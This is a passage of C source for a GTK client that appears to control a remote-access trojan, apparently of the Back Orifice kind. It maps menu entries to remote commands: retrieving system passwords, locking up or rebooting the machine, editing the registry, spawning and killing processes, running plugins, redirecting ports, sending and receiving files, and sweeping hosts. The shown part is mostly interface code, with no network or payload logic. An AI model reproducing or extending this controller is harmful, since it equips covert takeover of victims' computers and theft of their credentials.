	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "MM Play sound") == 0)
  {
	command = "SOUND";
	gtk_label_set(GTK_LABEL(box1_label), "wav filename:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Net connections") == 0)
  {
	command = "NETLIST";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Net delete") == 0)
  {
	command = "NETDISCONNECT";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Net use") == 0)
  {
	command = "NETCONNECT";
	gtk_label_set(GTK_LABEL(box1_label), "resource name:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Net view") == 0)
  {
	command = "NETVIEW";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Ping host") == 0)
  {
	command = "PING";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Plugin execute") == 0)
  {
	command = "PLUGINEXEC";
	gtk_label_set(GTK_LABEL(box1_label), "name:");
	gtk_label_set(GTK_LABEL(box2_label), "args:");
  }
  else if(strcasecmp(text, "Plugin kill") == 0)
  {
	command = "PLUGINKILL";
	gtk_label_set(GTK_LABEL(box1_label), "plugin id:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Plugins list") == 0)
  {
	command = "PLUGINLIST";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Process kill") == 0)
  {
	command = "PROCKILL";
	gtk_label_set(GTK_LABEL(box1_label), "proc. id:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Process list") == 0)
  {
	command = "PROCLIST";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Process spawn") == 0)
  {
	command = "PROCSPAWN";
	gtk_label_set(GTK_LABEL(box1_label), "app name:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Redir add") == 0)
  {
	command = "REDIRADD";
	gtk_label_set(GTK_LABEL(box1_label), "input port:");
	gtk_label_set(GTK_LABEL(box2_label), "dest. ip:");
  }
  else if(strcasecmp(text, "Redir del") == 0)
  {
	command = "REDIRDEL";
	gtk_label_set(GTK_LABEL(box1_label), "redir id:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Redir list") == 0)
  {
	command = "REDIRLIST";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Reg create key") == 0)
  {
	command = "REGMAKEKEY";
	gtk_label_set(GTK_LABEL(box1_label), "key name:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Reg delete key") == 0)
  {
	command = "REGDELKEY";
	gtk_label_set(GTK_LABEL(box1_label), "key name:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Reg delete value") == 0)
  {
	command = "REGDELVAL";
	gtk_label_set(GTK_LABEL(box1_label), "value name:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Reg list keys") == 0)
  {
	command = "REGLISTKEYS";
	gtk_label_set(GTK_LABEL(box1_label), "key name:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Reg list values") == 0)
  {
	command = "REGLISTVALS";
	gtk_label_set(GTK_LABEL(box1_label), "key name:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "Reg set value") == 0)
  {
	command = "REGSETVAL";
	gtk_label_set(GTK_LABEL(box1_label), "value name:");
	gtk_label_set(GTK_LABEL(box2_label), "data:");
  }
  else if(strcasecmp(text, "Resolve host") == 0)
  {
	command = "RESOLVE";
	gtk_label_set(GTK_LABEL(box1_label), "hostname:");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "System dialogbox") == 0)
  {
	command = "DIALOG";
	gtk_label_set(GTK_LABEL(box1_label), "text:");
	gtk_label_set(GTK_LABEL(box2_label), "title:");
  }
  else if(strcasecmp(text, "System info") == 0)
  {
	command = "INFO";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "System lockup") == 0)
  {
	command = "LOCKUP";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "System passwords") == 0)
  {
	command = "PASSES";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "System reboot") == 0)
  {
	command = "REBOOT";
	gtk_label_set(GTK_LABEL(box1_label), "not used");
	gtk_label_set(GTK_LABEL(box2_label), "not used");
  }
  else if(strcasecmp(text, "TCP file receive") == 0)
  {
	command = "TCPRECV";
	gtk_label_set(GTK_LABEL(box1_label), "file:");
	gtk_label_set(GTK_LABEL(box2_label), "port:");
  }
  else if(strcasecmp(text, "TCP file send") == 0)
  {
	command = "TCPSEND";
	gtk_label_set(GTK_LABEL(box1_label), "file:");
	gtk_label_set(GTK_LABEL(box2_label), "port:");
  }
}

void killpingwin(void)
{
  gtk_widget_destroy(ping_window);
}

void send_ping(void)
{
  /* setup for the *real* sendping() */
  gchar *hostlist;

  hostlist = gtk_entry_get_text(GTK_ENTRY(hostlist_entry));

  gtk_widget_destroy(ping_window);
  executecommand("SWEEPLIST", hostlist, NULL);
}

void find_file(void)
{
  /* pop-up a file dialog box! */
  filebox = gtk_file_selection_new("File selection");
  
  gtk_signal_connect(GTK_OBJECT(filebox), "delete_event",
		     (GtkSignalFunc) file_can_sel, filebox);

  gtk_signal_connect(GTK_OBJECT(GTK_FILE_SELECTION(filebox)->ok_button),
		     "clicked", (GtkSignalFunc) file_ok_sel, filebox);
  gtk_signal_connect(GTK_OBJECT(GTK_FILE_SELECTION(filebox)->cancel_button),
		     "clicked", (GtkSignalFunc) file_can_sel, filebox);

  gtk_widget_show(filebox);
}

void file_can_sel(GtkWidget *widget, gpointer *data)
{
  gtk_widget_destroy(filebox);
}

void file_ok_sel(GtkWidget *widget, gpointer *data)
{
  gtk_entry_set_text(GTK_ENTRY(hostlist_entry),
		gtk_file_selection_get_filename(GTK_FILE_SELECTION(filebox)));
  gtk_widget_destroy(filebox);
}

void change_style(void)
{
  GtkStyle *style;

  style=gtk_style_new();
  if(style->font) gdk_font_unref(style->font);
  style->font=gdk_font_load("-*-helvetica-medium-r-*-*-8-*-*-*-p-*-*-*");
  gtk_widget_set_default_style(style);
}
